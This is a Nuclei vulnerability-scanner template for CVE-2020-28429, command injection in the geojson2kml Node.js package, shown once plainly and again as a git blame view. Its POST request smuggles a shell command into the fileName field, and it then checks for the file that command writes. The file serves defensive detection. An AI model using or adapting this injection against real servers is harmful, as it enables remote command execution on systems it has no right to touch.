nuclei-templates/http/cves/2020/CVE-2020-28429.yaml

id: CVE-2020-28429

info:
  name: geojson2kml - Command Injection
  author: eeche,chae1xx1os,persona-twotwo,soonghee2
  severity: critical
  description: |
    Detects command injection vulnerability by checking if `hacked.txt` is created and contains the expected content.
  impact: |
    Successful exploitation of this vulnerability could result in unauthorized access, remote code execution, privilege escalation
  remediation: |
    Do not use geojson2kml. There is no fixed version for geojson2kml.
  reference:
    - https://snyk.io/vuln/SNYK-JS-GEOJSON2KML-1050412
    - https://github.com/advisories/GHSA-w83x-fp72-p9qc
    - https://nvd.nist.gov/vuln/detail/CVE-2020-28429
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-28429
    cwe-id: CWE-78
    epss-score: 0.01897
    epss-percentile: 0.8876
    cpe: cpe:2.3:a:geojson2kml_project:geojson2kml:*:*:*:*:*:node.js:*:*
  metadata:
    max-request: 1
    vendor: geojson2kml_project
    product: geojson2kml
    framework: node.js
  tags: cve,cve2020,rce,geojson2kml,file-upload,intrusive

variables:
  filename: '{{rand_base(6)}}'

http:
  - raw:
      - |
        POST /convert HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "fileName": "& echo \"{{randstr}}\" > {{filename}}.txt && ls",
          "geoJsonData": {
            "type": "FeatureCollection",
            "features": [
              {
                "type": "Feature",
                "geometry": {
                  "type": "Point",
                  "coordinates": [102.0, 0.5]
                },
                "properties": {
                  "prop0": "value0"
                }
              }
            ]
          }
        }

      - |
        GET /file/{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "{{randstr}}"

      - type: word
        part: header_2
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c5f3443f57ce4a21a84b28f2d09ba7fbe29f0383c89fb75f2b73e9a44dc1178e02204406e9738eacd9e9e354c6fc11dc4df96cd2a23c9eaa4c359d8d2b5b2cba1c7f:922c64590222798bb761d5b6d8e72950
Added CVE-2020-28429 by eeche 2024-08-07 15:28:31 +00:00			`id: CVE-2020-28429`

			`info:`
			`name: geojson2kml - Command Injection`
updated matchers & variable 2024-08-29 04:18:37 +00:00			`author: eeche,chae1xx1os,persona-twotwo,soonghee2`
Added CVE-2020-28429 by eeche 2024-08-07 15:28:31 +00:00			`severity: critical`
updated matchers & variable 2024-08-29 04:18:37 +00:00			`description: \|`
			Detects command injection vulnerability by checking if `hacked.txt` is created and contains the expected content.
			`impact: \|`
			`Successful exploitation of this vulnerability could result in unauthorized access, remote code execution, privilege escalation`
			`remediation: \|`
			`Do not use geojson2kml. There is no fixed version for geojson2kml.`
lint fix 2024-08-29 04:31:13 +00:00			`reference:`
Added CVE-2020-28429 by eeche 2024-08-07 15:28:31 +00:00			`- https://snyk.io/vuln/SNYK-JS-GEOJSON2KML-1050412`
			`- https://github.com/advisories/GHSA-w83x-fp72-p9qc`
updated matchers & variable 2024-08-29 04:18:37 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2020-28429`
Added CVE-2020-28429 by eeche 2024-08-07 15:28:31 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
			`cve-id: CVE-2020-28429`
minor-update 2024-08-29 04:54:10 +00:00			`cwe-id: CWE-78`
			`epss-score: 0.01897`
			`epss-percentile: 0.8876`
			`cpe: cpe:2.3:a:geojson2kml_project:geojson2kml::::::node.js::*`
updated matchers & variable 2024-08-29 04:18:37 +00:00			`metadata:`
minor-update 2024-08-29 04:54:10 +00:00			`max-request: 1`
			`vendor: geojson2kml_project`
			`product: geojson2kml`
			`framework: node.js`
updated matchers & variable 2024-08-29 04:18:37 +00:00			`tags: cve,cve2020,rce,geojson2kml,file-upload,intrusive`

			`variables:`
			`filename: '{{rand_base(6)}}'`
Added CVE-2020-28429 by eeche 2024-08-07 15:28:31 +00:00
			`http:`
			`- raw:`
			`- \|`
			`POST /convert HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/json`

			`{`
updated matchers & variable 2024-08-29 04:18:37 +00:00			`"fileName": "& echo \"{{randstr}}\" > {{filename}}.txt && ls",`
Added CVE-2020-28429 by eeche 2024-08-07 15:28:31 +00:00			`"geoJsonData": {`
			`"type": "FeatureCollection",`
			`"features": [`
			`{`
			`"type": "Feature",`
			`"geometry": {`
			`"type": "Point",`
			`"coordinates": [102.0, 0.5]`
			`},`
			`"properties": {`
			`"prop0": "value0"`
			`}`
			`}`
			`]`
			`}`
			`}`

			`- \|`
updated matchers & variable 2024-08-29 04:18:37 +00:00			`GET /file/{{filename}}.txt HTTP/1.1`
Added CVE-2020-28429 by eeche 2024-08-07 15:28:31 +00:00			`Host: {{Hostname}}`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
updated matchers & variable 2024-08-29 04:18:37 +00:00			`part: body_2`
Added CVE-2020-28429 by eeche 2024-08-07 15:28:31 +00:00			`words:`
			`- "{{randstr}}"`

			`- type: word`
updated matchers & variable 2024-08-29 04:18:37 +00:00			`part: header_2`
Added CVE-2020-28429 by eeche 2024-08-07 15:28:31 +00:00			`words:`
updated matchers & variable 2024-08-29 04:18:37 +00:00			`- "text/html"`

			`- type: status`
			`status:`
			`- 200`
chore: sign templates 🤖 2024-08-29 05:00:39 +00:00			`# digest: 4a0a00473045022100c5f3443f57ce4a21a84b28f2d09ba7fbe29f0383c89fb75f2b73e9a44dc1178e02204406e9738eacd9e9e354c6fc11dc4df96cd2a23c9eaa4c359d8d2b5b2cba1c7f:922c64590222798bb761d5b6d8e72950`